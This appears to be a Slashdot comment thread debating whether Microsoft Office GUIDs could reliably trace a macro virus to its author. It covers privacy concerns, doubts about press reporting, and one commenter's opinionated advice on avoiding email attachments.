or maybe i've had too much coffee this morning - my paranoia settings could need some recalibration.
And how easy would it be to fake the GUID? (Score:3)
Kithran
"stupid" virus? (Score:2)
Interesting opinion. I think it's pretty interesting, considering it points out how M$'s shoddy products lead to security holes. Granted, the
Executable documents are just plain wrong.
--
Let's get a few things straight... (Score:4)
What was discovered is that the GUID is transmitted to MS during the registration process.
Of course, the likelihood that the macro writer registered his copy of Windows using his real name and address is probably.... zero. So it's doubtful that MS has any record that GUID.
Which begs the question... What is the basis for ZDNet's claim that the GUID was used to "track" the document back to its creator?
More likely, they used the NNTP headers to get some hints about where to look, and when THAT trail led somewhere, they compared GUID's and thus established an apparent connection.
The real issue is not the recently discovered transmission of the GUID to MS during registration, it's the existence of the GUID itself that can reveal more about information than you realize. It's not "big brother," it's just bad design. And sloppy reporting.
Scary as hell (Score:4)
Agreed. Virus writers are like people shouting fire in a crowded theatre. They probably don't intend to really hurt anyone, but they know they are "playing with fire," so to speak. So if their actions hurt others they should be held accountable.
That said, I'd rather let the virus writer get away with it than have every Office document carry a unique ID traceable to the author. Americans are too freely giving up their privacy. Time to fight back.
Questionable MIS decisions (Score:2)
Here at CNET the decision was suddenly made this week to unilaterally roll out Outlook to all employees (Eudora was standard until now). What could the advantage of that change possibly be? Eudora is relatively small, reliable, and featureful; Outlook is enormous and crash-prone.
Backroom deal with Microsoft?
There's no proof (Score:2)
spreading virii, there is no proof that it was him..
because of the publicity regarding the UID's, anyone
smart enough to engineer this type of thing would
be smart enough to be able to cover their tracks..
The ZDNet artice claims that the MAC address is 'proof',
but any semi-literate coder would know that it's pretty
simple to change a MAC address (software settable..)
All they have is circumstantial evidence, so anyone who's
foolish enough to say "see the UIDS are good" is going to
be proven to look the fool when he's aquitted.
If the authorities push this, I hope the guy brings
a huge civil lawsuit against MS for invasion of privacy.
Benjamin Franklin's comment is pretty relevant. (Score:3)
trace problems (Score:2)
However, if a crime IS committed, and such wiretaps were in place, any person who had recently mentioned something even remotely similar in innoncent conversation while tapped would be instantly suspect, and with such a "likely prospect" prosecution would focus on that individual and neglect other leads which would be more realistic.
However, if wiretaps are common practice, a clever criminal will find a way to bypass them, or use them to broadcast false information, and end up implicating innocents of crimes they commit. Remember, the reason that wiretaps are effective now is that on the rare event that they are used, under court order, the suspect does not expect them and in many cases won't be prepared.
However, in the case of a court ordered wiretap, the police and/or prosecution already must have some probable cause to believe that the suspect is involved in a crime and that a wiretap would be beneficial to further evidence. Although this theory is pretty easy to get around, the police can get into serious civil trouble if too many "false alarms" are presented.
You occassionally hear about a search/seisure that went wrong. The wrong house was raided, torn apart and nothing was found which presents evidence of a crime. The victims of this false raid have rights to legal compensation for the intrusion. This simply won't happen too often under today's guidelines.
So if we come along and say that ID's are OK because we can trace criminals, we've gotten into the habit of invading the privacy of the innocent to weed out the guilty, even when no crime has taken place. If this can be attributed to a an
"illegal wiretap", then the evidence which lead to the aol account and all evidence which followed up as a result of that could get thrown out of court by a clever lawyer.
The real solution isn't really tracking down the virus writers anyway. Virus will always be with us. There is ZERO way to eliminate them completely, or to completely prevent new ones from being developed. Besides, it is remarkably simple to prevent getting infected, even if you don't have a virus scanner. It all comes down to a matter of trust.
Almost all of this stuff starts because some idiot, and yes, I mean IDIOT downloads a virus from some complete stranger, and is compelled to spread this virus to all his friends. This is the same fool who time and again will forward hoaxes to everyone he knows just because since it came over the internet it MUST be for real. For this problem there are two solutions. Either discover the the problem trait and eliminate it from the gene pool, or determine which people you know are reliable and don't ever accept attachments from anyone else.
Don't send word documents in email. I get so annoyed when people send me a 4 meg word document which has 10k worth of text in it. Do you think I'm going to waste my time reading it? I don't even have an installed copy of word, so its hardly important to me. Anyone who automatically assumes I will have office9? installed is not someone I wish to do business with. Forget the fact that half the time I don't even know what format the document is in, and don't think I'm going to spend any amount of time figuring it out.
The only attachments I will ever look at are images. THATS IT. I consider email a method of transfering text. That's INFORMATION in a form I can easily desseminate and text is the lowest common denominator in size and has the highest compression rate. If I absolutely NEED to see some huge picture, just give me a link to it and I'll make the decision to waste the bandwidth on it.
I have made a policy of reacting violently (in a verbal way) to anyone who sends me trash like this. I make it very clear, in no uncertain terms, that if they send me such information again I will prevent them from sending me ANYTHING again. Its amazing how able people are to distingush between hoaxes and legitimate information once you've made it clear what you don't want. Why is it then that they send it to you in the first place?
Ok.. Here's my list of things to avoid. If you get it, delete it.
- ALL spam, spam of all colors, it tastes just as bad. Don't reply from a legit mail account to complain, just delete it and forget about it.
- ANY attachments other than very small pictures. Most email readers will decode pictures and display them automatically, while it will display a link for other attachments. Don't accept word documents,
- Don't accept programs from ANYONE over icq or IRC. It doesn't matter WHAT it is or WHO sent it to you. Even if they're not trying to screw you over, you have no idea where they got it from or what might have infected their system previously and therefore the file they're sending you. Even if they're your best friend, you really don't know for sure. Ask them where they got the file from and download it from that source yourself. If they received it from someone else and don't know the source, then its automatically suspect already.
Don't let anyone use your computer for ANY reason, with the exception of the system administrator if you're in a work environment. People who bring over a floppy disk, insert it in your computer and bring up a program or any other file could be infecting your computer. We have networks these days guys, you don't need to transfer files around on floppies anymore. Also, people who use your computer for chatting can also download and run programs, no matter how much effort you put into avoiding it.
Avoid microsoft products. They're the greatest threat to the security of any environment. If you must use them, consider them to be insecure. Don't trust them for any tasks which must be fail-safe, and assume you'll have to reboot often and reload occasionally.
Backup early, backup often, and keep your backups safe.
-Restil
restil@alignment.net
GUID is NOT UNIQUE! (Score:2)
The ZDNet story reports that the GUID has traced back to an AOL user--however most users on AOL access the Internet via modems, and have no Ethernet card! (It suprises me that this caveat is not mentioned in the ZDNet article.) The GUID is likely identical to many other dial-up users.
Also, since GUIDs are based on MAC address, GUIDs are tied to a specific computer (or more correctly, a specific Ethernet card)--not a specific user. This creates an interesting twist in a computer lab environment.
And even then, MAC addresses can be faked. Or, if the GUID is stored in (I'm guessing) the Windows Registry, it's even easier to change.
For these reasons, GUIDs are meaningless. It is a poorly designed user tracking mechanism that doesn't work. The only reason one should fear GUIDs is that they may be used as evidence which may lead to false prosecution by the ignorant.
---BTW, the GUID is not Microsoft application specific. GUIDs are available as part of Microsoft's API's, and are used in many non-Microsoft applications. Look around a little and you'll see.